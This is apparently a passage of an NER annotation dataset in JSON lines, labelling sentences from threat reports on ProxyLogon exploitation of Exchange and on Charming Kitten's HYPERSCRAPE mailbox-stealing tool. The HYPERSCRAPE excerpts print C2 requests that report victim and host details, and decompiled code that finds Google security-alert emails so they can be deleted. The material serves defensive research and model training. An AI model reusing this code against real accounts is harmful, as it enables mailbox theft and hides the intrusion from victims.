Strike.","entities":[{"id":50428,"label":"tools","start_offset":257,"end_offset":270},{"id":50424,"label":"identity","start_offset":71,"end_offset":78},{"id":50425,"label":"threat-actor","start_offset":82,"end_offset":90},{"id":50427,"label":"SOFTWARE","start_offset":204,"end_offset":219},{"id":50423,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":50426,"label":"identity","start_offset":136,"end_offset":175}],"relations":[{"id":969,"from_id":50423,"to_id":50425,"type":"duplicate-of"},{"id":970,"from_id":50423,"to_id":50426,"type":"impersonates"}],"Comments":[]} {"id":4578,"text":"In just two days, the volume observed and categorized as spam by Gmail exceeded 4,500 emails.","entities":[{"id":50429,"label":"SOFTWARE","start_offset":65,"end_offset":70}],"relations":[],"Comments":[]} {"id":4579,"text":"Email contents vary from COVID-19 vaccine policy to the humanitarian crisis in Ukraine.","entities":[{"id":50430,"label":"location","start_offset":79,"end_offset":86}],"relations":[],"Comments":[]} {"id":4580,"text":"Last March it seemed the world came to a stand-still as the COVID-19 pandemic begin to rapidly spread.","entities":[{"id":50431,"label":"TIME","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":4581,"text":"While businesses, sporting events, and schools started shutting down, cybercriminals remained active as ever.","entities":[],"relations":[],"Comments":[]} {"id":4582,"text":"In 2020, the Trend Micro Zero Day Initiative™ (ZDI) published 1,453 advisories, the most ever in the history of the program.","entities":[{"id":50433,"label":"identity","start_offset":13,"end_offset":51},{"id":50432,"label":"TIME","start_offset":3,"end_offset":7}],"relations":[],"Comments":[]} {"id":4583,"text":"More startling is the fact that 18.6% of all disclosures were published without a fix from the vendor—another record-breaking stat.","entities":[],"relations":[],"Comments":[]} {"id":4584,"text":" As ZDI predicted, 2021 continued to be a busy year.","entities":[{"id":50434,"label":"identity","start_offset":4,"end_offset":7},{"id":50435,"label":"TIME","start_offset":19,"end_offset":23}],"relations":[],"Comments":[]} {"id":4585,"text":"In March 2021, Microsoft kicked off the patch cycle early after releasing an advisory regarding the mass exploitation of four zero-days vulnerabilities by a Chinese Hacking group, HAFNIUM, on the on-premises versions of the Microsoft Exchange Server.","entities":[{"id":50436,"label":"TIME","start_offset":3,"end_offset":13},{"id":50437,"label":"identity","start_offset":15,"end_offset":24},{"id":50438,"label":"vulnerability","start_offset":126,"end_offset":151},{"id":50439,"label":"threat-actor","start_offset":180,"end_offset":187},{"id":50440,"label":"location","start_offset":157,"end_offset":164},{"id":50441,"label":"SOFTWARE","start_offset":196,"end_offset":249}],"relations":[{"id":971,"from_id":50439,"to_id":50440,"type":"located-at"},{"id":972,"from_id":50439,"to_id":50438,"type":"exploits"},{"id":973,"from_id":50441,"to_id":50438,"type":"has"}],"Comments":[]} {"id":4586,"text":"In the following days of the attack, Trend Micro reported that at least 30,000 organizations were thought to have been attacked in the US, and 63,000 servers remained exposed to these exploits.","entities":[{"id":50443,"label":"location","start_offset":135,"end_offset":137},{"id":50442,"label":"identity","start_offset":37,"end_offset":48}],"relations":[],"Comments":[]} {"id":4587,"text":" The vulnerability has been dubbed as ProxyLogon by the researchers at DEVCORE, who are credited with finding the bugs in the proxy architecture and the logon mechanism of Exchange.","entities":[{"id":50446,"label":"SOFTWARE","start_offset":172,"end_offset":180},{"id":50444,"label":"vulnerability","start_offset":38,"end_offset":48},{"id":50445,"label":"identity","start_offset":71,"end_offset":78}],"relations":[{"id":974,"from_id":50446,"to_id":50444,"type":"has"}],"Comments":[]} {"id":4588,"text":"DEVCORE reported two of the four zero-days (CVE-2021-26855 and CVE-2021-27065) to Microsoft Security Response Center (MSRC).","entities":[{"id":50447,"label":"identity","start_offset":0,"end_offset":7},{"id":50448,"label":"vulnerability","start_offset":44,"end_offset":58},{"id":50449,"label":"vulnerability","start_offset":63,"end_offset":77},{"id":50450,"label":"identity","start_offset":82,"end_offset":123}],"relations":[],"Comments":[]} {"id":4589,"text":"On March 2, Volexity reported in-the-wild exploitation of the vulnerabilities, to which DEVCORE confirmed that the exploit observed by Volexity was the one submitted to MSRC.","entities":[{"id":50451,"label":"TIME","start_offset":3,"end_offset":10},{"id":50452,"label":"identity","start_offset":12,"end_offset":20},{"id":50453,"label":"identity","start_offset":88,"end_offset":95},{"id":50454,"label":"identity","start_offset":135,"end_offset":143},{"id":50455,"label":"identity","start_offset":169,"end_offset":173}],"relations":[],"Comments":[]} {"id":4590,"text":"Since then, there has been opportunistic exploitation by various threat actors and ransomware groups (Dearcry, BlackKingdom) since majority of Outlook Web App portals are public and indexed by search engines like Google Search, Shodan, Binaryedge, Censys, Zoomeye etc.","entities":[{"id":50458,"label":"SOFTWARE","start_offset":143,"end_offset":158},{"id":50459,"label":"SOFTWARE","start_offset":213,"end_offset":226},{"id":50461,"label":"SOFTWARE","start_offset":236,"end_offset":246},{"id":50462,"label":"SOFTWARE","start_offset":248,"end_offset":254},{"id":50456,"label":"threat-actor","start_offset":102,"end_offset":109},{"id":50457,"label":"threat-actor","start_offset":111,"end_offset":123},{"id":50463,"label":"SOFTWARE","start_offset":256,"end_offset":263},{"id":50460,"label":"SOFTWARE","start_offset":228,"end_offset":234}],"relations":[],"Comments":[]} {"id":4591,"text":"According to Shodan, on March 4, there were more than 266,000 Exchange Servers vulnerable to the ProxyLogon vulnerability, a day after the patch was released.","entities":[{"id":50465,"label":"TIME","start_offset":24,"end_offset":31},{"id":50464,"label":"identity","start_offset":13,"end_offset":19},{"id":50466,"label":"SOFTWARE","start_offset":62,"end_offset":78},{"id":50467,"label":"vulnerability","start_offset":97,"end_offset":121}],"relations":[{"id":976,"from_id":50466,"to_id":50467,"type":"has"}],"Comments":[]} {"id":4592,"text":" Fig - Shodan Results ","entities":[{"id":50468,"label":"SOFTWARE","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} {"id":4593,"text":"In lieu of these exploits, let’s take a look at how Trend Micro Vision One™ and Trend Micro Cloud One™ can provide protection against two of the four zero-days, CVE-2021-26855 and CVE-2021-27065.","entities":[{"id":50469,"label":"SOFTWARE","start_offset":52,"end_offset":75},{"id":50470,"label":"SOFTWARE","start_offset":80,"end_offset":102},{"id":50471,"label":"vulnerability","start_offset":161,"end_offset":175},{"id":50472,"label":"vulnerability","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} {"id":4594,"text":"Overview:","entities":[],"relations":[],"Comments":[]} {"id":4595,"text":"Two bugs are chained to achieve the remote code execution and for the attack to be successful, an attacker requires access to the Outlook Web App portal of the vulnerable Exchange Server, and a valid email address","entities":[{"id":50473,"label":"SOFTWARE","start_offset":130,"end_offset":145},{"id":50474,"label":"SOFTWARE","start_offset":171,"end_offset":186}],"relations":[],"Comments":[]} {"id":4596,"text":" CVE-2021-26855: Microsoft Exchange Server Remote Code Execution Vulnerability (pre-authenticated Server-Side Request Forgery [SSRF]) CVE-2021-27065: Microsoft Exchange Server Remote Code Execution Vulnerability (post-authenticated Arbitrary File Write) Fig - MS Exchange Client Access Protocol Architecture The Client Access services (Outlook Web App portal) proxies the incoming connections to the Backend services.","entities":[{"id":50475,"label":"vulnerability","start_offset":3,"end_offset":17},{"id":50478,"label":"vulnerability","start_offset":152,"end_offset":213},{"id":50476,"label":"vulnerability","start_offset":19,"end_offset":80},{"id":50477,"label":"vulnerability","start_offset":136,"end_offset":150}],"relations":[{"id":977,"from_id":50476,"to_id":50475,"type":"duplicate-of"},{"id":978,"from_id":50478,"to_id":50477,"type":"duplicate-of"}],"Comments":[]} {"id":4597,"text":"As per the Exchange documentation, clients don’t directly connect to the backend services.","entities":[{"id":50479,"label":"SOFTWARE","start_offset":11,"end_offset":19}],"relations":[],"Comments":[]} {"id":4598,"text":"But because of the SSRF vulnerability, attackers can query the internal backend services and APIs on the Exchange Server, bypassing the frontend proxy.","entities":[{"id":50481,"label":"SOFTWARE","start_offset":105,"end_offset":120},{"id":50480,"label":"vulnerability","start_offset":19,"end_offset":37}],"relations":[],"Comments":[]} {"id":4599,"text":"By abusing the SSRF, attackers can create session IDs and access tokens for privileged accounts with the context of the Exchange Control Panel, which can be used to write files with attacker-controlled content at a location on the target server, chosen by the attacker.","entities":[{"id":50482,"label":"attack-pattern","start_offset":15,"end_offset":19},{"id":50483,"label":"SOFTWARE","start_offset":120,"end_offset":128}],"relations":[],"Comments":[]} {"id":4600,"text":"Since Exchange depends on Internet Information Services (IIS) webserver, an attacker can write ASPX webshells and run arbitrary commands as SYSTEM on the Exchange Server. In January 2021, we came across extensive use of Chopper ASPX webshells in targeted attacks by malicious actors to establish persistence and a foothold on the public-facing Outlook Web App servers. Trend Micro Cloud One™ – Workload Security Correlation:","entities":[{"id":50484,"label":"SOFTWARE","start_offset":6,"end_offset":14},{"id":50487,"label":"malware","start_offset":95,"end_offset":109},{"id":50489,"label":"malware","start_offset":221,"end_offset":243},{"id":50490,"label":"SOFTWARE","start_offset":345,"end_offset":360},{"id":50491,"label":"SOFTWARE","start_offset":372,"end_offset":394},{"id":50485,"label":"SOFTWARE","start_offset":26,"end_offset":61},{"id":50486,"label":"SOFTWARE","start_offset":154,"end_offset":169},{"id":50488,"label":"TIME","start_offset":175,"end_offset":187}],"relations":[],"Comments":[]} {"id":4601,"text":"Trend Micro Cloud One™ – Workload Security is a cloud-native solution that provides automated security via powerful APIs.","entities":[{"id":50492,"label":"SOFTWARE","start_offset":0,"end_offset":22}],"relations":[],"Comments":[]} {"id":4602,"text":"Security as code allows DevOps teams to bake security into their build pipeline to release continuously and frequently, so developers like yourself, can keep working without disruption from security.","entities":[],"relations":[],"Comments":[]} {"id":4603,"text":"Workload Security uses advanced security controls such as intrusion prevention system (IPS), deep packet inspection (DPI), and integrity monitoring to protect Exchange Servers from attackers that could exploit ProxyLogon.","entities":[{"id":50494,"label":"SOFTWARE","start_offset":159,"end_offset":175},{"id":50493,"label":"vulnerability","start_offset":210,"end_offset":220}],"relations":[{"id":979,"from_id":50494,"to_id":50493,"type":"has"}],"Comments":[]} {"id":4604,"text":"The following detection rules safeguard a vulnerable Exchange Server from the CVEs reported: Intrusion Prevention System detections: 1010854 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855) 1010868 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) 1010870 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) – 1 1007170 - Identified Suspicious China Chopper Webshell Communication (ATT&CK T1100) 1005934 - Identified Suspicious Command Injection Attack Integrity Monitoring detections: 1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities 1010854 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855) 1007170 - Identified Suspicious China Chopper Webshell Communication (ATT&CK T1100) 1010870 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1 1005934 - Identified Suspicious Command Injection Attack ","entities":[{"id":50495,"label":"SOFTWARE","start_offset":53,"end_offset":68},{"id":50496,"label":"vulnerability","start_offset":147,"end_offset":225},{"id":50497,"label":"vulnerability","start_offset":236,"end_offset":314},{"id":50498,"label":"vulnerability","start_offset":325,"end_offset":403},{"id":50501,"label":"vulnerability","start_offset":664,"end_offset":742},{"id":50499,"label":"threat-actor","start_offset":615,"end_offset":622},{"id":50500,"label":"malware","start_offset":780,"end_offset":802},{"id":50502,"label":"vulnerability","start_offset":847,"end_offset":925}],"relations":[],"Comments":[]} {"id":4605,"text":"IM Rules: 1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities Trend Micro Vision One™ Correlation: Fig - Microsoft Exchange Server RCE Vulnerability (CVE-2021-26855 + CVE-2021-27065) Trend Micro Vision One™ is a purpose-built, threat defense platform with extended detection and response (XDR) capabilities that work to prevent majority of attacks with automated protection.","entities":[{"id":50505,"label":"SOFTWARE","start_offset":83,"end_offset":106},{"id":50504,"label":"threat-actor","start_offset":46,"end_offset":53},{"id":50507,"label":"SOFTWARE","start_offset":213,"end_offset":236},{"id":50506,"label":"vulnerability","start_offset":131,"end_offset":208},{"id":50503,"label":"SOFTWARE","start_offset":25,"end_offset":43}],"relations":[],"Comments":[]} {"id":4606,"text":"The solution allows you to see more and respond faster by collecting and correlating data across email, endpoints, servers, cloud workloads, and networks.","entities":[],"relations":[],"Comments":[]} {"id":4607,"text":" Using the Trend Micro Vision One Workbench, you can easily see what threats were detected, attack techniques, and a prioritized list of risky devices and users.","entities":[{"id":50508,"label":"SOFTWARE","start_offset":11,"end_offset":43}],"relations":[],"Comments":[]} {"id":4608,"text":"With Trend Micro Vision One, we ran a public proof of concept (PoC) available online exploiting the ProxyLogon vulnerability.","entities":[{"id":50509,"label":"SOFTWARE","start_offset":5,"end_offset":27},{"id":50510,"label":"vulnerability","start_offset":100,"end_offset":124}],"relations":[],"Comments":[]} {"id":4609,"text":"The above image shows the vulnerability detected and all the assets related to the alert for further investigation.","entities":[],"relations":[],"Comments":[]} {"id":4610,"text":"Let’s take a deeper look:","entities":[],"relations":[],"Comments":[]} {"id":4611,"text":" Fig - Potential Chopper Webshell Detection","entities":[{"id":50511,"label":"malware","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} {"id":4612,"text":" The Potential Chopper Webshell Execution model triggers when the web shell is already present on the machine and is being used as a backdoor to run commands as SYSTEM on the Exchange Server using China Chopper. The metrics provided by this model should be investigated carefully, since the ProxyLogon zero-day vulnerability was exploited in-the-wild, before Microsoft addressed the issue publicly.","entities":[{"id":50512,"label":"malware","start_offset":18,"end_offset":34},{"id":50514,"label":"malware","start_offset":200,"end_offset":213},{"id":50515,"label":"vulnerability","start_offset":295,"end_offset":328},{"id":50513,"label":"SOFTWARE","start_offset":178,"end_offset":193},{"id":50516,"label":"identity","start_offset":363,"end_offset":372}],"relations":[],"Comments":[]} {"id":4613,"text":"Microsoft has since taken things a step further by creating patches for out-of-support versions of Exchange.","entities":[{"id":50517,"label":"identity","start_offset":0,"end_offset":9},{"id":50518,"label":"SOFTWARE","start_offset":99,"end_offset":107}],"relations":[],"Comments":[]} {"id":4614,"text":"Overall, Microsoft released patches for 89 unique CVEs in March—14 of which were listed as Critical and 75 listed as Important in severity.","entities":[{"id":50519,"label":"identity","start_offset":9,"end_offset":18},{"id":50520,"label":"vulnerability","start_offset":40,"end_offset":54},{"id":50521,"label":"TIME","start_offset":58,"end_offset":66}],"relations":[],"Comments":[]} {"id":4615,"text":" Fig - Microsoft Exchange Server Possible ASPX Web Shell The above model triggers when a new web shell is created.","entities":[{"id":50522,"label":"vulnerability","start_offset":11,"end_offset":60}],"relations":[],"Comments":[]} {"id":4616,"text":"You can see the path and name of the web shell.","entities":[{"id":50523,"label":"attack-pattern","start_offset":37,"end_offset":46}],"relations":[],"Comments":[]} {"id":4617,"text":"Fig - Potential Chopper Webshell Execution Fig - Identified Suspicious China Chopper Webshell Communication Fig - Possible Credential Dumping via Command Line ","entities":[{"id":50524,"label":"malware","start_offset":16,"end_offset":32},{"id":50525,"label":"malware","start_offset":76,"end_offset":98},{"id":50526,"label":"attack-pattern","start_offset":133,"end_offset":151}],"relations":[],"Comments":[]} {"id":4618,"text":"This model is triggered when an attacker fetches the credentials using a command-line from within the memory using Mimikatz.","entities":[{"id":50527,"label":"tools","start_offset":115,"end_offset":123}],"relations":[],"Comments":[]} {"id":4619,"text":"Since the web shell runs as the SYSTEM user, an attacker can fetch the NT LAN Manager (NTLM) hashes of the logged-in users, create or delete accounts, and perform extensive post-exploitation activities on the Exchange Server. Figure - Executing Mimikatz as SYSTEM using CC Fig - System Owner User Discovery The above event was triggered when we ran whoami from within the Chopper web shell.","entities":[{"id":50529,"label":"SOFTWARE","start_offset":209,"end_offset":224},{"id":50530,"label":"malware","start_offset":386,"end_offset":403},{"id":50531,"label":"tools","start_offset":250,"end_offset":258},{"id":50528,"label":"attack-pattern","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} {"id":4620,"text":"Since requests to the ASPX web shell are handled by the privileged w3wp.exe, an IIS Worker Process in the configured IIS application pool (Microsoft Exchange App pool) runs the commands in the context of NT Authority\\SYSTEM user.","entities":[{"id":50532,"label":"attack-pattern","start_offset":22,"end_offset":36},{"id":50533,"label":"FILEPATH","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} {"id":4621,"text":"RCA Diagrams: Fig. Executing commands using Chopper CnC Conclusion","entities":[],"relations":[],"Comments":[]} {"id":4622,"text":"There is no silver bullet when it comes to cybersecurity but using solutions that bake into your development pipeline to provide security as early as possible is better than scrambling for patches after deployment.","entities":[],"relations":[],"Comments":[]} {"id":4623,"text":"Quick and easy to deploy solutions like Trend Micro Cloud One and Trend Micro Vision One can provide you with SecOps-approved security from build-time to runtime without slowing you down.","entities":[{"id":50534,"label":"SOFTWARE","start_offset":40,"end_offset":61},{"id":50535,"label":"SOFTWARE","start_offset":66,"end_offset":88}],"relations":[],"Comments":[]} {"id":4624,"text":"Imagine that!","entities":[],"relations":[],"Comments":[]} {"id":4625,"text":" Tags Cloud | APT & Targeted Attacks | Expert Perspective | Exploits & Vulnerabilities | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":4626,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.","entities":[{"id":50537,"label":"identity","start_offset":55,"end_offset":61},{"id":50538,"label":"threat-actor","start_offset":132,"end_offset":137},{"id":50539,"label":"threat-actor","start_offset":142,"end_offset":157},{"id":50540,"label":"location","start_offset":162,"end_offset":169},{"id":50536,"label":"identity","start_offset":11,"end_offset":14}],"relations":[{"id":980,"from_id":50538,"to_id":50540,"type":"located-at"},{"id":981,"from_id":50539,"to_id":50540,"type":"located-at"}],"Comments":[]} {"id":4627,"text":"For years, we have been countering this group’s efforts to hijack accounts, deploy malware, and their use of novel techniques to conduct espionage aligned with the interests of the Iranian government.","entities":[{"id":50541,"label":"identity","start_offset":181,"end_offset":199}],"relations":[],"Comments":[]} {"id":4628,"text":"Now, we’re shining light on a new tool of theirs.","entities":[],"relations":[],"Comments":[]} {"id":4629,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":50543,"label":"identity","start_offset":18,"end_offset":21},{"id":50544,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":50545,"label":"malware","start_offset":69,"end_offset":80},{"id":50546,"label":"SOFTWARE","start_offset":111,"end_offset":116},{"id":50542,"label":"TIME","start_offset":3,"end_offset":16},{"id":50547,"label":"SOFTWARE","start_offset":118,"end_offset":124},{"id":50548,"label":"SOFTWARE","start_offset":130,"end_offset":147}],"relations":[{"id":982,"from_id":50545,"to_id":50544,"type":"authored-by"}],"Comments":[]} {"id":4630,"text":"The attacker runs HYPERSCRAPE on their own machine to download victims’ inboxes using previously acquired credentials.","entities":[{"id":50549,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} {"id":4631,"text":"We have seen it deployed against fewer than two dozen accounts located in Iran.","entities":[{"id":50550,"label":"location","start_offset":74,"end_offset":78}],"relations":[],"Comments":[]} {"id":4632,"text":"The oldest known sample is from 2020, and the tool is still under active development.","entities":[{"id":50551,"label":"TIME","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} {"id":4633,"text":"We have taken actions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.","entities":[],"relations":[],"Comments":[]} {"id":4634,"text":"This post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a Telegram grabber tool.","entities":[{"id":50552,"label":"malware","start_offset":47,"end_offset":58},{"id":50554,"label":"SOFTWARE","start_offset":110,"end_offset":118},{"id":50553,"label":"identity","start_offset":71,"end_offset":74}],"relations":[],"Comments":[]} {"id":4635,"text":"HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":50555,"label":"malware","start_offset":0,"end_offset":11},{"id":14080,"label":"threat-actor","start_offset":25,"end_offset":40}],"relations":[],"Comments":[]} {"id":4636,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.","entities":[{"id":50556,"label":"malware","start_offset":28,"end_offset":39},{"id":14084,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[],"Comments":[]} {"id":4637,"text":" HYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired.","entities":[{"id":50557,"label":"malware","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} {"id":4638,"text":"It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail.","entities":[{"id":50558,"label":"SOFTWARE","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} {"id":4639,"text":"Once logged in, the tool changes the account’s language settings to English and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking them unread.","entities":[],"relations":[],"Comments":[]} {"id":4640,"text":"After the program has finished downloading the inbox, it reverts the language back to its original settings and deletes any security emails from Google.","entities":[{"id":50559,"label":"identity","start_offset":145,"end_offset":151}],"relations":[],"Comments":[]} {"id":4641,"text":"Earlier versions contained the option to request data from Google Takeout, a feature which allows users to export their data to a downloadable archive file.","entities":[{"id":50560,"label":"SOFTWARE","start_offset":59,"end_offset":73}],"relations":[],"Comments":[]} {"id":4642,"text":"The tool is written in .NET for Windows PCs and is designed to run on the attacker's machine.","entities":[{"id":50561,"label":"SOFTWARE","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} {"id":4643,"text":"We tested HYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo! and Microsoft accounts.","entities":[{"id":50562,"label":"malware","start_offset":10,"end_offset":21},{"id":50563,"label":"SOFTWARE","start_offset":62,"end_offset":67},{"id":50564,"label":"identity","start_offset":115,"end_offset":121},{"id":50565,"label":"identity","start_offset":126,"end_offset":135}],"relations":[],"Comments":[]} {"id":4644,"text":"HYPERSCRAPE won't run unless in a directory with other file dependencies.","entities":[{"id":50566,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4645,"text":"When launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK'' and will terminate if it's not found.","entities":[],"relations":[],"Comments":[]} {"id":4646,"text":"In the version tested, the C2 was unobfuscated and stored as a hardcoded string.","entities":[],"relations":[],"Comments":[]} {"id":4647,"text":"In later versions it was obfuscated with Base64.","entities":[],"relations":[],"Comments":[]} {"id":4648,"text":"GET http:\/\/{C2}\/Index.php?Ck=OK HTTP\/1.1","entities":[{"id":50567,"label":"URL","start_offset":4,"end_offset":31}],"relations":[],"Comments":[]} {"id":4649,"text":"Host: {C2}","entities":[],"relations":[],"Comments":[]} {"id":4650,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} {"id":4651,"text":"The tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string to a valid cookie file.","entities":[],"relations":[],"Comments":[]} {"id":4652,"text":"A new form is displayed if the information is not provided via command prompt.","entities":[],"relations":[],"Comments":[]} {"id":4653,"text":"Once provided, the data in the \"Identity\" field is sent to a C2 for confirmation.","entities":[],"relations":[],"Comments":[]} {"id":4654,"text":"Again, the response is expected to be \"OK\".","entities":[],"relations":[],"Comments":[]} {"id":4655,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":14119,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} {"id":4656,"text":"Host: {C2} Accept-Encoding: gzip","entities":[],"relations":[],"Comments":[]} {"id":4657,"text":"If the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and drop.","entities":[],"relations":[],"Comments":[]} {"id":4658,"text":"After parsing, the cookies are inserted into a local cache used by the embedded web browser.","entities":[],"relations":[],"Comments":[]} {"id":4659,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} {"id":4660,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[{"id":50568,"label":"SOFTWARE","start_offset":30,"end_offset":35}],"relations":[],"Comments":[]} {"id":4661,"text":"The user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the attacker to enable the basic HTML view in Gmail.","entities":[{"id":50569,"label":"SOFTWARE","start_offset":157,"end_offset":162}],"relations":[],"Comments":[]} {"id":4662,"text":"If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.","entities":[],"relations":[],"Comments":[]} {"id":4663,"text":"Once the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[{"id":50570,"label":"malware","start_offset":57,"end_offset":68}],"relations":[],"Comments":[]} {"id":4664,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} {"id":4665,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[{"id":50571,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4666,"text":"It does the following for each email found: The emails are saved with \".eml\" extensions under the Downloads directory with the filename corresponding to the subject.","entities":[],"relations":[],"Comments":[]} {"id":4667,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} {"id":4668,"text":"When finished, a HTTP POST request is made to the C2 to relay the status and system information.","entities":[],"relations":[],"Comments":[]} {"id":4669,"text":"The downloaded emails are not sent to the C2.","entities":[],"relations":[],"Comments":[]} {"id":4670,"text":"POST http:\/\/{C2}\/?Key={GUID}&Crc={Identifier} { \"appName\": \"Gmail Downloader\", \"targetname\": \"{Email}\", \"HostName\": \"REDACTED\", \"srcUserIP\": \"REDACTED\", \"actionType\": \"First\", \"timeOccurrence\": \"05\/01\/2022 05:50:31 PM\", \"OS\": \"REDACTED\", \"OSVersion\": \"REDACTED\", \"SystemModel\": \"REDACTED\", \"SystemType\": \"REDACTED\", \"srcName\": \"REDACTED\", \"srcOrgName\": \"REDACTED\" }","entities":[{"id":50573,"label":"TIME","start_offset":195,"end_offset":217},{"id":14144,"label":"URL","start_offset":5,"end_offset":44}],"relations":[],"Comments":[]} {"id":4671,"text":"The program will delete any security emails from Google generated by the attacker’s activity.","entities":[{"id":50574,"label":"identity","start_offset":49,"end_offset":55}],"relations":[],"Comments":[]} {"id":4672,"text":"private bool IsThereAnyEMail() { List < GeckoHtmlElement > list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName(\"span\") where x.TextContent.StartsWith (\"Security alert\") || x.TextContent.StartsWith(\"Archive of Google data requested\") || x.TextContent.StartsWith(\"Your Google data archive is ready\") || x.TextContent.StartsWith(\"Your Google data is ready\") || x.TextContent.StartsWith(\"Critical security alert\") ||","entities":[],"relations":[],"Comments":[]} {"id":4673,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} {"id":4674,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} {"id":4675,"text":"StartsWith(\"Help us protect you: Security advice from Google\")","entities":[],"relations":[],"Comments":[]} {"id":4676,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} {"id":4677,"text":"GeckoHtmlElement > (","entities":[],"relations":[],"Comments":[]} {"id":4678,"text":"; bool flag = list.Count == 0; return !flag; }","entities":[],"relations":[],"Comments":[]} {"id":4679,"text":"Data from Google Takeout is also available upon request, but the option was only found in early builds.","entities":[{"id":50575,"label":"SOFTWARE","start_offset":10,"end_offset":24}],"relations":[],"Comments":[]} {"id":4680,"text":"The functionality was not automated and it's unclear why it was removed in later versions.","entities":[],"relations":[],"Comments":[]} {"id":4681,"text":"When conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to relay the cookies and account name, both of which are required to accomplish the Takeout.","entities":[],"relations":[],"Comments":[]} {"id":4682,"text":"When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data.","entities":[],"relations":[],"Comments":[]} {"id":4683,"text":"public void ManageTakeOut() { string text = \"PipeName\";","entities":[],"relations":[],"Comments":[]} {"id":4684,"text":"Process process = new Process(); process.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text); process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName; process.Start();","entities":[],"relations":[],"Comments":[]} {"id":4685,"text":"PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag)","entities":[],"relations":[],"Comments":[]} {"id":4686,"text":"{ try { JsonInfo jsonInfo = pipeCommunication.Read(); switch (jsonInfo.Type) { case JsonType.GetCookies: jsonInfo.Data = this.CookieText; pipeCommunication.Write(jsonInfo); break; case JsonType.TakeOutFile: flag = true; break; case JsonType.GetUsername: while (this.OperationObject.GetUsername() == null) { Thread.Sleep(1000); }","entities":[],"relations":[],"Comments":[]} {"id":4687,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} {"id":4688,"text":"catch (Exception) { bool hasExited = process.HasExited; if (hasExited) { flag = true; } }","entities":[],"relations":[],"Comments":[]} {"id":4689,"text":"pipeCommunication.Close(); }","entities":[],"relations":[],"Comments":[]} {"id":4690,"text":"TAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security community, and for companies and individuals that may be targeted.","entities":[{"id":50576,"label":"identity","start_offset":0,"end_offset":3},{"id":50577,"label":"threat-actor","start_offset":75,"end_offset":90}],"relations":[],"Comments":[]} {"id":4691,"text":"It’s why we do things like work with our CyberCrime Investigation Group to share critical information relevant to law enforcement.","entities":[],"relations":[],"Comments":[]} {"id":4692,"text":"We hope doing so will improve understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger protections across the industry.","entities":[],"relations":[],"Comments":[]} 